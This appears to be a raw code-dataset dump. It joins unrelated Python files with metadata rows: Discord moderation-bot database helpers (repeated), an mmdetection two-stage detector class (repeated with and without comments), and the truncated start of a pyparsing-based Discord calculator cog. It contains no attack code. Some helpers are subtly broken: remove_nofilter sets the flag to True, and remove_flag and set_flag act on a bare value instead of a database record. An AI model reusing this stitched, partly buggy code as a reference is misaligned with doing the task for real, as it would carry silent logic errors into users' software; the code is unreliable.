async def remove_timed_restriction(user_id: int, type: str):
time_restriction = await get_time_restrictions_by_user_type(user_id, type)
if time_restriction:
await time_restriction.delete()
async def set_time_restriction_alert(user_id: int, type: str):
time_restriction = await get_time_restrictions_by_user_type(user_id, type)
if time_restriction:
await time_restriction.update(alerted=True).apply()
async def add_timed_role(user_id: int, role_id: int, expiring_date: datetime.datetime):
await add_dbmember_if_not_exist(user_id)
entry = await get_time_role_by_user_type(user_id, role_id)
if not entry:
return await models.TimedRole.create(id=generate_id(), user_id=user_id, role_id=role_id, expiring_date=expiring_date)
await entry.update(expiring_date=expiring_date).apply()
return entry
async def remove_timed_role(user_id: int, role_id: int):
timed_role = await get_time_role_by_user_type(user_id, role_id)
if timed_role:
await timed_role.delete()
async def get_time_role_by_user_type(user_id: int, role_id: int):
return await models.TimedRole.query.where(
(models.TimedRole.user_id == user_id) & (models.TimedRole.role_id == role_id)).gino.first()
async def get_timed_roles():
return await models.TimedRole.query.gino.all()
async def add_flag(name: str):
await models.Flag.create(name=name)
async def get_flag(name: str):
if flag := await models.Flag.get(name):
return flag.value
return None
async def remove_flag(name: str):
flag = await get_flag(name)
if flag:
await flag.delete()
async def set_flag(name: str, value: bool):
flag = await get_flag(name)
if flag:
await flag.update(value=value).apply()
async def add_softban(user_id: int, issuer_id: int, reason: str):
await add_dbmember_if_not_exist(user_id)
await models.Softban.create(id=generate_id(), user=user_id, issuer=issuer_id, reason=reason)
async def remove_softban(user_id: int):
softban = await get_softban(user_id)
if softban:
await softban.delete()
async def add_dbmember(user_id: int):
return await models.Member.create(id=user_id)
async def add_dbmember_if_not_exist(user_id: int):
db_member = await get_dbmember(user_id)
if not db_member:
db_member = await add_dbmember(user_id)
return db_member
async def get_dbmember(user_id: int):
return await models.Member.get(user_id)
async def add_dbchannel(channel_id: int, name: str):
return await models.Channel.create(id=channel_id, name=name)
async def get_dbchannel(channel_id: int):
return await models.Channel.get(channel_id)
async def add_dbrole(role_id: int, name: str):
return await models.Role.create(id=role_id, name=name)
async def get_dbrole(role_id: int):
return await models.Role.get(role_id)
async def get_softban(user_id: int):
return await models.Softban.query.where(models.Softban.user == user_id).gino.first()
async def add_watch(user_id: int):
db_member = await add_dbmember_if_not_exist(user_id)
await db_member.update(watched=True).apply()
async def remove_watch(user_id: int):
db_member = await get_dbmember(user_id)
if db_member:
await db_member.update(watched=False).apply()
async def is_watched(user_id: int):
db_member = await get_dbmember(user_id)
return db_member.watched if db_member else False
async def add_nofilter(channel: TextChannel):
db_channel = await get_dbchannel(channel.id)
if not db_channel:
db_channel = await add_dbchannel(channel.id, channel.name)
await db_channel.update(nofilter=True).apply()
async def remove_nofilter(channel: TextChannel):
db_channel = await get_dbchannel(channel.id)
if db_channel:
await db_channel.update(nofilter=True).apply()
async def check_nofilter(channel: TextChannel):
channel = await models.Channel.get(channel.id)
return channel.nofilter if channel else False
async def add_friendcode_3ds(user_id: int, fc: int):
await add_dbmember_if_not_exist(user_id)
if fcs := await get_friendcode(user_id):
await fcs.update(fc_3ds=fc).apply()
return
await models.FriendCode.create(id=user_id, fc_3ds=fc)
async def add_friendcode_switch(user_id: int, fc: int):
await add_dbmember_if_not_exist(user_id)
if fcs := await get_friendcode(user_id):
await fcs.update(fc_switch=fc).apply()
return
await models.FriendCode.create(id=user_id, fc_switch=fc)
async def get_friendcode(user_id: int):
return await models.FriendCode.get(user_id)
async def delete_friendcode_3ds(user_id: int):
friendcodes = await get_friendcode(user_id)
if friendcodes:
await friendcodes.update(fc_3ds=None).apply()
if friendcodes.fc_3ds is None and friendcodes.fc_switch is None:
await friendcodes.delete()
async def delete_friendcode_switch(user_id: int):
friendcodes = await get_friendcode(user_id)
if friendcodes:
await friendcodes.update(fc_switch=None).apply()
if friendcodes.fc_3ds is None and friendcodes.fc_switch is None:
await friendcodes.delete()
async def add_rule(number: int, description: str):
rule = await get_rule(number)
if not rule:
await models.Rule.create(id=number, description=description)
async def edit_rule(number: int, description: str):
rule = await get_rule(number)
if rule:
await rule.update(description=description).apply()
async def delete_rule(number: int):
rule = await get_rule(number)
if rule:
await rule.delete()
async def get_rules():
return await models.Rule.query.order_by(models.Rule.id).gino.all()
async def get_rule(number: int):
return await models.Rule.get(number)
async def add_reminder(date: datetime.datetime, author: int, reminder: str):
await add_dbmember_if_not_exist(author)
await models.RemindMeEntry.create(id=generate_id(), date=date, author=author, reminder=reminder)
async def get_reminders() -> list[models.RemindMeEntry]:
return await models.RemindMeEntry.query.order_by(models.RemindMeEntry.date).gino.all()
async def remove_reminder(reminder_id: int):
db_reminder = await models.RemindMeEntry.get(reminder_id)
await db_reminder.delete()
async def create_tag(title: str, content: str, author: int):
await add_dbmember_if_not_exist(author)
await models.Tag.create(id=generate_id(), title=title, content=content, author=author)
async def get_tag(title: str) -> models.Tag:
return await models.Tag.query.where(models.Tag.title == title).gino.first()
async def get_tags() -> list[models.Tag]:
return await models.Tag.query.order_by(models.Tag.id).gino.all()
async def search_tags(query: str) -> list[models.Tag]:
return await models.Tag.query.where(models.Tag.title.ilike(f"%{query}%")).limit(10).gino.all()
async def delete_tag(title: str):
db_tag = await get_tag(title)
await db_tag.delete()
| 31.876011
| 154
| 0.726958
|
from . import models
import datetime
from discord import utils, TextChannel
def generate_id():
return utils.time_snowflake(datetime.datetime.now())
async def add_permanent_role(user_id: int, role_id: int):
await add_dbmember_if_not_exist(user_id)
if not await models.PermanentRole.query.where((models.PermanentRole.user_id == user_id) & (
models.PermanentRole.role_id == role_id)).gino.first():
return await models.PermanentRole.create(user_id=user_id, role_id=role_id)
async def remove_permanent_role(user_id: int, role_id: int):
permanent_role = await models.PermanentRole.query.where((models.PermanentRole.user_id == user_id) & (
models.PermanentRole.role_id == role_id)).gino.first()
if permanent_role:
await permanent_role.delete()
return permanent_role
async def get_permanent_roles(user_id: int):
db_member = await get_dbmember(user_id)
if db_member:
return await models.Role.query.where((models.Role.id == models.PermanentRole.role_id) & (models.PermanentRole.user_id == db_member.id)).gino.all()
async def add_staff(user_id: int, position: str):
await add_dbmember_if_not_exist(user_id)
staff = await get_staff(user_id) or await get_helper(user_id)
if staff:
await staff.update(position=position).apply()
else:
await models.Staff.create(id=user_id, position=position)
async def add_helper(user_id: int, position: str, console: str = None):
await add_dbmember_if_not_exist(user_id)
if staff := await get_staff(user_id):
await staff.update(console=console).apply()
else:
await models.Staff.create(id=user_id, position=position, console=console)
async def remove_staff(user_id: int):
staff = await get_staff(user_id)
if staff:
if staff.console:
await staff.update(position="Helper").apply()
else:
await staff.delete()
async def remove_helper(user_id: int):
helper = await get_helper(user_id)
if helper:
if helper.position != "Helper":
await helper.update(console=None).apply()
else:
await helper.delete()
async def get_staff_all():
return await models.Staff.query.where(models.Staff.position != 'Helper').gino.all()
async def get_staff(user_id: int):
return await models.Staff.query.where(
(models.Staff.position != 'Helper') & (models.Staff.id == user_id)).gino.first()
async def get_helpers():
return await models.Staff.query.where(models.Staff.console.isnot(None)).gino.all()
async def get_helper(user_id: int):
return await models.Staff.query.where(models.Staff.id == user_id).gino.first()
async def add_warn(user_id: int, issuer_id: int, reason: str):
await add_dbmember_if_not_exist(user_id)
await add_dbmember_if_not_exist(issuer_id)
await models.Warn.create(id=generate_id(), user=user_id, issuer=issuer_id, reason=reason)
async def copy_warn(user_id: int, warn: models.Warn):
await add_dbmember_if_not_exist(user_id)
warn.id = utils.time_snowflake(utils.snowflake_time(warn.id) + datetime.timedelta(milliseconds=1))
while await get_warn(warn.id):
warn.id = utils.time_snowflake(utils.snowflake_time(warn.id) + datetime.timedelta(milliseconds=1))
warn.user = user_id
await warn.create()
async def get_warn(warn_id: int):
return await models.Warn.get(warn_id)
async def get_warns(user_id: int):
return await models.Warn.query.where(models.Warn.user == user_id).gino.all()
async def remove_warn_id(user_id: int, index: int):
warn = await models.Warn.query.where(models.Warn.user == user_id).offset(index - 1).gino.first()
await warn.delete()
async def remove_warns(user_id: int):
n_warns = await (models.db.select([models.db.func.count()]).where(models.Warn.user == user_id).gino.scalar())
if n_warns:
await models.Warn.delete.where(models.Warn.user == user_id).gino.status()
return n_warns
async def add_timed_restriction(user_id: int, end_date: datetime.datetime, type: str):
await add_dbmember_if_not_exist(user_id)
await models.TimedRestriction.create(id=generate_id(), user=user_id, type=type,
end_date=end_date)
async def get_time_restrictions_by_user(user_id: int):
return await models.TimedRestriction.query.where(models.TimedRestriction.user == user_id).gino.all()
async def get_time_restrictions_by_user_type(user_id: int, type: str):
return await models.TimedRestriction.query.where((models.TimedRestriction.user == user_id) & (
models.TimedRestriction.type == type)).gino.first()
async def get_time_restrictions_by_type(type: str):
return await models.TimedRestriction.query.where(models.TimedRestriction.type == type).gino.all()
async def remove_timed_restriction(user_id: int, type: str):
time_restriction = await get_time_restrictions_by_user_type(user_id, type)
if time_restriction:
await time_restriction.delete()
async def set_time_restriction_alert(user_id: int, type: str):
time_restriction = await get_time_restrictions_by_user_type(user_id, type)
if time_restriction:
await time_restriction.update(alerted=True).apply()
async def add_timed_role(user_id: int, role_id: int, expiring_date: datetime.datetime):
await add_dbmember_if_not_exist(user_id)
entry = await get_time_role_by_user_type(user_id, role_id)
if not entry:
return await models.TimedRole.create(id=generate_id(), user_id=user_id, role_id=role_id, expiring_date=expiring_date)
await entry.update(expiring_date=expiring_date).apply()
return entry
async def remove_timed_role(user_id: int, role_id: int):
timed_role = await get_time_role_by_user_type(user_id, role_id)
if timed_role:
await timed_role.delete()
async def get_time_role_by_user_type(user_id: int, role_id: int):
return await models.TimedRole.query.where(
(models.TimedRole.user_id == user_id) & (models.TimedRole.role_id == role_id)).gino.first()
async def get_timed_roles():
return await models.TimedRole.query.gino.all()
async def add_flag(name: str):
await models.Flag.create(name=name)
async def get_flag(name: str):
if flag := await models.Flag.get(name):
return flag.value
return None
async def remove_flag(name: str):
flag = await get_flag(name)
if flag:
await flag.delete()
async def set_flag(name: str, value: bool):
flag = await get_flag(name)
if flag:
await flag.update(value=value).apply()
async def add_softban(user_id: int, issuer_id: int, reason: str):
await add_dbmember_if_not_exist(user_id)
await models.Softban.create(id=generate_id(), user=user_id, issuer=issuer_id, reason=reason)
async def remove_softban(user_id: int):
softban = await get_softban(user_id)
if softban:
await softban.delete()
async def add_dbmember(user_id: int):
return await models.Member.create(id=user_id)
async def add_dbmember_if_not_exist(user_id: int):
db_member = await get_dbmember(user_id)
if not db_member:
db_member = await add_dbmember(user_id)
return db_member
async def get_dbmember(user_id: int):
return await models.Member.get(user_id)
async def add_dbchannel(channel_id: int, name: str):
return await models.Channel.create(id=channel_id, name=name)
async def get_dbchannel(channel_id: int):
return await models.Channel.get(channel_id)
async def add_dbrole(role_id: int, name: str):
return await models.Role.create(id=role_id, name=name)
async def get_dbrole(role_id: int):
return await models.Role.get(role_id)
async def get_softban(user_id: int):
return await models.Softban.query.where(models.Softban.user == user_id).gino.first()
async def add_watch(user_id: int):
db_member = await add_dbmember_if_not_exist(user_id)
await db_member.update(watched=True).apply()
async def remove_watch(user_id: int):
db_member = await get_dbmember(user_id)
if db_member:
await db_member.update(watched=False).apply()
async def is_watched(user_id: int):
db_member = await get_dbmember(user_id)
return db_member.watched if db_member else False
async def add_nofilter(channel: TextChannel):
db_channel = await get_dbchannel(channel.id)
if not db_channel:
db_channel = await add_dbchannel(channel.id, channel.name)
await db_channel.update(nofilter=True).apply()
async def remove_nofilter(channel: TextChannel):
db_channel = await get_dbchannel(channel.id)
if db_channel:
await db_channel.update(nofilter=True).apply()
async def check_nofilter(channel: TextChannel):
channel = await models.Channel.get(channel.id)
return channel.nofilter if channel else False
async def add_friendcode_3ds(user_id: int, fc: int):
await add_dbmember_if_not_exist(user_id)
if fcs := await get_friendcode(user_id):
await fcs.update(fc_3ds=fc).apply()
return
await models.FriendCode.create(id=user_id, fc_3ds=fc)
async def add_friendcode_switch(user_id: int, fc: int):
await add_dbmember_if_not_exist(user_id)
if fcs := await get_friendcode(user_id):
await fcs.update(fc_switch=fc).apply()
return
await models.FriendCode.create(id=user_id, fc_switch=fc)
async def get_friendcode(user_id: int):
return await models.FriendCode.get(user_id)
async def delete_friendcode_3ds(user_id: int):
friendcodes = await get_friendcode(user_id)
if friendcodes:
await friendcodes.update(fc_3ds=None).apply()
if friendcodes.fc_3ds is None and friendcodes.fc_switch is None:
await friendcodes.delete()
async def delete_friendcode_switch(user_id: int):
friendcodes = await get_friendcode(user_id)
if friendcodes:
await friendcodes.update(fc_switch=None).apply()
if friendcodes.fc_3ds is None and friendcodes.fc_switch is None:
await friendcodes.delete()
async def add_rule(number: int, description: str):
rule = await get_rule(number)
if not rule:
await models.Rule.create(id=number, description=description)
async def edit_rule(number: int, description: str):
rule = await get_rule(number)
if rule:
await rule.update(description=description).apply()
async def delete_rule(number: int):
rule = await get_rule(number)
if rule:
await rule.delete()
async def get_rules():
return await models.Rule.query.order_by(models.Rule.id).gino.all()
async def get_rule(number: int):
return await models.Rule.get(number)
async def add_reminder(date: datetime.datetime, author: int, reminder: str):
await add_dbmember_if_not_exist(author)
await models.RemindMeEntry.create(id=generate_id(), date=date, author=author, reminder=reminder)
async def get_reminders() -> list[models.RemindMeEntry]:
return await models.RemindMeEntry.query.order_by(models.RemindMeEntry.date).gino.all()
async def remove_reminder(reminder_id: int):
db_reminder = await models.RemindMeEntry.get(reminder_id)
await db_reminder.delete()
async def create_tag(title: str, content: str, author: int):
await add_dbmember_if_not_exist(author)
await models.Tag.create(id=generate_id(), title=title, content=content, author=author)
async def get_tag(title: str) -> models.Tag:
return await models.Tag.query.where(models.Tag.title == title).gino.first()
async def get_tags() -> list[models.Tag]:
return await models.Tag.query.order_by(models.Tag.id).gino.all()
async def search_tags(query: str) -> list[models.Tag]:
return await models.Tag.query.where(models.Tag.title.ilike(f"%{query}%")).limit(10).gino.all()
async def delete_tag(title: str):
db_tag = await get_tag(title)
await db_tag.delete()
| true
| true
|
f70510cecaf633bc140f5d0280b6040db7788e73
| 9,585
|
py
|
Python
|
bdd_mtl/mmdet/models/detectors/two_stage.py
|
XDong18/bdd-mtl
|
90459c090a2bc4a89a929740e5cf5d37c1b34a4b
|
[
"BSD-3-Clause"
] | 79
|
2020-04-23T04:39:00.000Z
|
2022-03-08T09:50:09.000Z
|
mmdet/models/detectors/two_stage_ori.py
|
xyldmc/siamese-mask-rcnn_mmdetection
|
999e5bfcbd3c493bf69b8556c40eb26c9feeb459
|
[
"Apache-2.0"
] | 3
|
2021-11-04T20:39:52.000Z
|
2022-03-10T20:29:47.000Z
|
mmdet/models/detectors/two_stage_ori.py
|
ducminhkhoi/FAPIS
|
c89703006a2a5250f4d1c71e0aad958d72526885
|
[
"Apache-2.0"
] | 29
|
2020-04-23T07:49:15.000Z
|
2022-03-26T11:48:53.000Z
|
import torch
import torch.nn as nn
from .base import BaseDetector
from .test_mixins import RPNTestMixin, BBoxTestMixin, MaskTestMixin
from .. import builder
from ..registry import DETECTORS
from mmdet.core import bbox2roi, bbox2result, build_assigner, build_sampler
@DETECTORS.register_module
class TwoStageDetector(BaseDetector, RPNTestMixin, BBoxTestMixin,
MaskTestMixin):
def __init__(self,
backbone,
neck=None,
shared_head=None,
rpn_head=None,
bbox_roi_extractor=None,
bbox_head=None,
mask_roi_extractor=None,
mask_head=None,
train_cfg=None,
test_cfg=None,
pretrained=None):
super(TwoStageDetector, self).__init__()
self.backbone = builder.build_backbone(backbone)
if neck is not None:
self.neck = builder.build_neck(neck)
if shared_head is not None:
self.shared_head = builder.build_shared_head(shared_head)
if rpn_head is not None:
self.rpn_head = builder.build_head(rpn_head)
if bbox_head is not None:
self.bbox_roi_extractor = builder.build_roi_extractor(
bbox_roi_extractor)
self.bbox_head = builder.build_head(bbox_head)
if mask_head is not None:
if mask_roi_extractor is not None:
self.mask_roi_extractor = builder.build_roi_extractor(
mask_roi_extractor)
self.share_roi_extractor = False
else:
self.share_roi_extractor = True
self.mask_roi_extractor = self.bbox_roi_extractor
self.mask_head = builder.build_head(mask_head)
self.train_cfg = train_cfg
self.test_cfg = test_cfg
self.init_weights(pretrained=pretrained)
@property
def with_rpn(self):
return hasattr(self, 'rpn_head') and self.rpn_head is not None
def init_weights(self, pretrained=None):
super(TwoStageDetector, self).init_weights(pretrained)
self.backbone.init_weights(pretrained=pretrained)
if self.with_neck:
if isinstance(self.neck, nn.Sequential):
for m in self.neck:
m.init_weights()
else:
self.neck.init_weights()
if self.with_shared_head:
self.shared_head.init_weights(pretrained=pretrained)
if self.with_rpn:
self.rpn_head.init_weights()
if self.with_bbox:
self.bbox_roi_extractor.init_weights()
self.bbox_head.init_weights()
if self.with_mask:
self.mask_head.init_weights()
if not self.share_roi_extractor:
self.mask_roi_extractor.init_weights()
def extract_feat(self, img):
x = self.backbone(img)
if self.with_neck:
x = self.neck(x)
return x
def forward_train(self,
img,
img_meta,
gt_bboxes,
gt_labels,
gt_bboxes_ignore=None,
gt_masks=None,
proposals=None):
x = self.extract_feat(img)
losses = dict()
# RPN forward and loss
if self.with_rpn:
rpn_outs = self.rpn_head(x)
rpn_loss_inputs = rpn_outs + (gt_bboxes, img_meta,
self.train_cfg.rpn)
rpn_losses = self.rpn_head.loss(
*rpn_loss_inputs, gt_bboxes_ignore=gt_bboxes_ignore)
losses.update(rpn_losses)
proposal_cfg = self.train_cfg.get('rpn_proposal',
self.test_cfg.rpn)
proposal_inputs = rpn_outs + (img_meta, proposal_cfg)
proposal_list = self.rpn_head.get_bboxes(*proposal_inputs)
else:
proposal_list = proposals
# assign gts and sample proposals
if self.with_bbox or self.with_mask:
bbox_assigner = build_assigner(self.train_cfg.rcnn.assigner)
bbox_sampler = build_sampler(
self.train_cfg.rcnn.sampler, context=self)
num_imgs = img.size(0)
if gt_bboxes_ignore is None:
gt_bboxes_ignore = [None for _ in range(num_imgs)]
sampling_results = []
for i in range(num_imgs):
assign_result = bbox_assigner.assign(proposal_list[i],
gt_bboxes[i],
gt_bboxes_ignore[i],
gt_labels[i])
sampling_result = bbox_sampler.sample(
assign_result,
proposal_list[i],
gt_bboxes[i],
gt_labels[i],
feats=[lvl_feat[i][None] for lvl_feat in x])
sampling_results.append(sampling_result)
# bbox head forward and loss
if self.with_bbox:
rois = bbox2roi([res.bboxes for res in sampling_results])
# TODO: a more flexible way to decide which feature maps to use
bbox_feats = self.bbox_roi_extractor(
x[:self.bbox_roi_extractor.num_inputs], rois)
if self.with_shared_head:
bbox_feats = self.shared_head(bbox_feats)
cls_score, bbox_pred = self.bbox_head(bbox_feats)
bbox_targets = self.bbox_head.get_target(sampling_results,
gt_bboxes, gt_labels,
self.train_cfg.rcnn)
loss_bbox = self.bbox_head.loss(cls_score, bbox_pred,
*bbox_targets)
losses.update(loss_bbox)
# mask head forward and loss
if self.with_mask:
if not self.share_roi_extractor:
pos_rois = bbox2roi(
[res.pos_bboxes for res in sampling_results])
mask_feats = self.mask_roi_extractor(
x[:self.mask_roi_extractor.num_inputs], pos_rois)
if self.with_shared_head:
mask_feats = self.shared_head(mask_feats)
else:
pos_inds = []
device = bbox_feats.device
for res in sampling_results:
pos_inds.append(
torch.ones(
res.pos_bboxes.shape[0],
device=device,
dtype=torch.uint8))
pos_inds.append(
torch.zeros(
res.neg_bboxes.shape[0],
device=device,
dtype=torch.uint8))
pos_inds = torch.cat(pos_inds)
mask_feats = bbox_feats[pos_inds]
mask_pred = self.mask_head(mask_feats)
mask_targets = self.mask_head.get_target(sampling_results,
gt_masks,
self.train_cfg.rcnn)
pos_labels = torch.cat(
[res.pos_gt_labels for res in sampling_results])
loss_mask = self.mask_head.loss(mask_pred, mask_targets,
pos_labels)
losses.update(loss_mask)
return losses
def simple_test(self, img, img_meta, proposals=None, rescale=False):
"""Test without augmentation."""
assert self.with_bbox, "Bbox head must be implemented."
x = self.extract_feat(img)
proposal_list = self.simple_test_rpn(
x, img_meta, self.test_cfg.rpn) if proposals is None else proposals
det_bboxes, det_labels = self.simple_test_bboxes(
x, img_meta, proposal_list, self.test_cfg.rcnn, rescale=rescale)
bbox_results = bbox2result(det_bboxes, det_labels,
self.bbox_head.num_classes)
if not self.with_mask:
return bbox_results
else:
segm_results = self.simple_test_mask(
x, img_meta, det_bboxes, det_labels, rescale=rescale)
return bbox_results, segm_results
def aug_test(self, imgs, img_metas, rescale=False):
"""Test with augmentations.
If rescale is False, then returned bboxes and masks will fit the scale
of imgs[0].
"""
# recompute feats to save memory
proposal_list = self.aug_test_rpn(
self.extract_feats(imgs), img_metas, self.test_cfg.rpn)
det_bboxes, det_labels = self.aug_test_bboxes(
self.extract_feats(imgs), img_metas, proposal_list,
self.test_cfg.rcnn)
if rescale:
_det_bboxes = det_bboxes
else:
_det_bboxes = det_bboxes.clone()
_det_bboxes[:, :4] *= img_metas[0][0]['scale_factor']
bbox_results = bbox2result(_det_bboxes, det_labels,
self.bbox_head.num_classes)
# det_bboxes always keep the original scale
if self.with_mask:
segm_results = self.aug_test_mask(
self.extract_feats(imgs), img_metas, det_bboxes, det_labels)
return bbox_results, segm_results
else:
return bbox_results
| 39.282787
| 79
| 0.549609
|
import torch
import torch.nn as nn
from .base import BaseDetector
from .test_mixins import RPNTestMixin, BBoxTestMixin, MaskTestMixin
from .. import builder
from ..registry import DETECTORS
from mmdet.core import bbox2roi, bbox2result, build_assigner, build_sampler
@DETECTORS.register_module
class TwoStageDetector(BaseDetector, RPNTestMixin, BBoxTestMixin,
MaskTestMixin):
def __init__(self,
backbone,
neck=None,
shared_head=None,
rpn_head=None,
bbox_roi_extractor=None,
bbox_head=None,
mask_roi_extractor=None,
mask_head=None,
train_cfg=None,
test_cfg=None,
pretrained=None):
super(TwoStageDetector, self).__init__()
self.backbone = builder.build_backbone(backbone)
if neck is not None:
self.neck = builder.build_neck(neck)
if shared_head is not None:
self.shared_head = builder.build_shared_head(shared_head)
if rpn_head is not None:
self.rpn_head = builder.build_head(rpn_head)
if bbox_head is not None:
self.bbox_roi_extractor = builder.build_roi_extractor(
bbox_roi_extractor)
self.bbox_head = builder.build_head(bbox_head)
if mask_head is not None:
if mask_roi_extractor is not None:
self.mask_roi_extractor = builder.build_roi_extractor(
mask_roi_extractor)
self.share_roi_extractor = False
else:
self.share_roi_extractor = True
self.mask_roi_extractor = self.bbox_roi_extractor
self.mask_head = builder.build_head(mask_head)
self.train_cfg = train_cfg
self.test_cfg = test_cfg
self.init_weights(pretrained=pretrained)
@property
def with_rpn(self):
return hasattr(self, 'rpn_head') and self.rpn_head is not None
def init_weights(self, pretrained=None):
super(TwoStageDetector, self).init_weights(pretrained)
self.backbone.init_weights(pretrained=pretrained)
if self.with_neck:
if isinstance(self.neck, nn.Sequential):
for m in self.neck:
m.init_weights()
else:
self.neck.init_weights()
if self.with_shared_head:
self.shared_head.init_weights(pretrained=pretrained)
if self.with_rpn:
self.rpn_head.init_weights()
if self.with_bbox:
self.bbox_roi_extractor.init_weights()
self.bbox_head.init_weights()
if self.with_mask:
self.mask_head.init_weights()
if not self.share_roi_extractor:
self.mask_roi_extractor.init_weights()
def extract_feat(self, img):
x = self.backbone(img)
if self.with_neck:
x = self.neck(x)
return x
def forward_train(self,
img,
img_meta,
gt_bboxes,
gt_labels,
gt_bboxes_ignore=None,
gt_masks=None,
proposals=None):
x = self.extract_feat(img)
losses = dict()
if self.with_rpn:
rpn_outs = self.rpn_head(x)
rpn_loss_inputs = rpn_outs + (gt_bboxes, img_meta,
self.train_cfg.rpn)
rpn_losses = self.rpn_head.loss(
*rpn_loss_inputs, gt_bboxes_ignore=gt_bboxes_ignore)
losses.update(rpn_losses)
proposal_cfg = self.train_cfg.get('rpn_proposal',
self.test_cfg.rpn)
proposal_inputs = rpn_outs + (img_meta, proposal_cfg)
proposal_list = self.rpn_head.get_bboxes(*proposal_inputs)
else:
proposal_list = proposals
if self.with_bbox or self.with_mask:
bbox_assigner = build_assigner(self.train_cfg.rcnn.assigner)
bbox_sampler = build_sampler(
self.train_cfg.rcnn.sampler, context=self)
num_imgs = img.size(0)
if gt_bboxes_ignore is None:
gt_bboxes_ignore = [None for _ in range(num_imgs)]
sampling_results = []
for i in range(num_imgs):
assign_result = bbox_assigner.assign(proposal_list[i],
gt_bboxes[i],
gt_bboxes_ignore[i],
gt_labels[i])
sampling_result = bbox_sampler.sample(
assign_result,
proposal_list[i],
gt_bboxes[i],
gt_labels[i],
feats=[lvl_feat[i][None] for lvl_feat in x])
sampling_results.append(sampling_result)
if self.with_bbox:
rois = bbox2roi([res.bboxes for res in sampling_results])
bbox_feats = self.bbox_roi_extractor(
x[:self.bbox_roi_extractor.num_inputs], rois)
if self.with_shared_head:
bbox_feats = self.shared_head(bbox_feats)
cls_score, bbox_pred = self.bbox_head(bbox_feats)
bbox_targets = self.bbox_head.get_target(sampling_results,
gt_bboxes, gt_labels,
self.train_cfg.rcnn)
loss_bbox = self.bbox_head.loss(cls_score, bbox_pred,
*bbox_targets)
losses.update(loss_bbox)
if self.with_mask:
if not self.share_roi_extractor:
pos_rois = bbox2roi(
[res.pos_bboxes for res in sampling_results])
mask_feats = self.mask_roi_extractor(
x[:self.mask_roi_extractor.num_inputs], pos_rois)
if self.with_shared_head:
mask_feats = self.shared_head(mask_feats)
else:
pos_inds = []
device = bbox_feats.device
for res in sampling_results:
pos_inds.append(
torch.ones(
res.pos_bboxes.shape[0],
device=device,
dtype=torch.uint8))
pos_inds.append(
torch.zeros(
res.neg_bboxes.shape[0],
device=device,
dtype=torch.uint8))
pos_inds = torch.cat(pos_inds)
mask_feats = bbox_feats[pos_inds]
mask_pred = self.mask_head(mask_feats)
mask_targets = self.mask_head.get_target(sampling_results,
gt_masks,
self.train_cfg.rcnn)
pos_labels = torch.cat(
[res.pos_gt_labels for res in sampling_results])
loss_mask = self.mask_head.loss(mask_pred, mask_targets,
pos_labels)
losses.update(loss_mask)
return losses
def simple_test(self, img, img_meta, proposals=None, rescale=False):
assert self.with_bbox, "Bbox head must be implemented."
x = self.extract_feat(img)
proposal_list = self.simple_test_rpn(
x, img_meta, self.test_cfg.rpn) if proposals is None else proposals
det_bboxes, det_labels = self.simple_test_bboxes(
x, img_meta, proposal_list, self.test_cfg.rcnn, rescale=rescale)
bbox_results = bbox2result(det_bboxes, det_labels,
self.bbox_head.num_classes)
if not self.with_mask:
return bbox_results
else:
segm_results = self.simple_test_mask(
x, img_meta, det_bboxes, det_labels, rescale=rescale)
return bbox_results, segm_results
def aug_test(self, imgs, img_metas, rescale=False):
proposal_list = self.aug_test_rpn(
self.extract_feats(imgs), img_metas, self.test_cfg.rpn)
det_bboxes, det_labels = self.aug_test_bboxes(
self.extract_feats(imgs), img_metas, proposal_list,
self.test_cfg.rcnn)
if rescale:
_det_bboxes = det_bboxes
else:
_det_bboxes = det_bboxes.clone()
_det_bboxes[:, :4] *= img_metas[0][0]['scale_factor']
bbox_results = bbox2result(_det_bboxes, det_labels,
self.bbox_head.num_classes)
if self.with_mask:
segm_results = self.aug_test_mask(
self.extract_feats(imgs), img_metas, det_bboxes, det_labels)
return bbox_results, segm_results
else:
return bbox_results
| true
| true
|
f705116959898fd81eae2168f0c9e139ab6337b3
| 7,603
|
py
|
Python
|
cogs/calculator.py
|
MerciDvor/modbot
|
f1a11eaa8e88d297ee19ca37aacc41489c0d0350
|
[
"MIT"
] | 11
|
2019-01-10T22:09:31.000Z
|
2021-12-14T05:26:10.000Z
|
cogs/calculator.py
|
MerciDvor/modbot
|
f1a11eaa8e88d297ee19ca37aacc41489c0d0350
|
[
"MIT"
] | 5
|
2019-01-10T07:20:19.000Z
|
2021-04-22T00:57:34.000Z
|
cogs/calculator.py
|
MerciDvor/modbot
|
f1a11eaa8e88d297ee19ca37aacc41489c0d0350
|
[
"MIT"
] | 34
|
2019-01-10T05:49:29.000Z
|
2022-02-11T14:04:54.000Z
|
from __future__ import division
import discord, math, operator
from discord.ext import commands
from pyparsing import (Literal,CaselessLiteral,Word,Combine,Group,Optional,
ZeroOrMore,Forward,nums,alphas,oneOf)
__author__='Paul McGuire'
__version__ = '$Revision: 0.0 $'
__date__ = '$Date: 2009-03-20 $'
__source__ = """http://pyparsing.wikispaces.com/file/view/fourFn.py
http://pyparsing.wikispaces.com/message/view/home/15549426
"""
__note__ = """
This is a re-wrap of Paul McGuire's fourFn.py as a class, so it can
be used easily in other places of the code. Most of the work wad done
by corpnewt, all I did was clean it and create the results in embeds.
Also, the messages are deleted after, except for the correct answer.
"""
class NumericStringParserForPython3(object):
"""
Most of this code comes from the fourFn.py pyparsing example
"""
def pushFirst(self, strg, loc, toks):
self.exprStack.append(toks[0])
def pushUMinus(self, strg, loc, toks):
if toks and toks[0]=='-':
self.exprStack.append('unary -')
def __init__(self):
"""
Please use any of the following symbols:
expop :: '^'
multop :: '*' | '/'
addop :: '+' | '-'
integer :: ['+' | '-'] '0'..'9'+
"""
point = Literal(".")
e = CaselessLiteral("E")
fnumber = Combine(Word("+-"+nums, nums) +
Optional(point + Optional(Word(nums))) +
Optional(e + Word("+-"+nums, nums)))
ident = Word(alphas, alphas+nums+"_$")
plus = Literal("+")
minus = Literal("-")
mult = Literal("*")
div = Literal("/")
lpar = Literal("(").suppress()
rpar = Literal(")").suppress()
addop = plus | minus
multop = mult | div
expop = Literal("^")
pi = CaselessLiteral("PI")
expr = Forward()
atom = ((Optional(oneOf("- +")) +
(pi|e|fnumber|ident+lpar+expr+rpar).setParseAction(self.pushFirst))
| Optional(oneOf("- +")) + Group(lpar+expr+rpar)
).setParseAction(self.pushUMinus)
# by defining exponentiation as "atom [ ^ factor ]..." instead of
# "atom [ ^ atom ]...", we get right-to-left exponents, instead of left-to-right
# that is, 2^3^2 = 2^(3^2), not (2^3)^2.
factor = Forward()
factor << atom + ZeroOrMore((expop + factor).setParseAction(self.pushFirst))
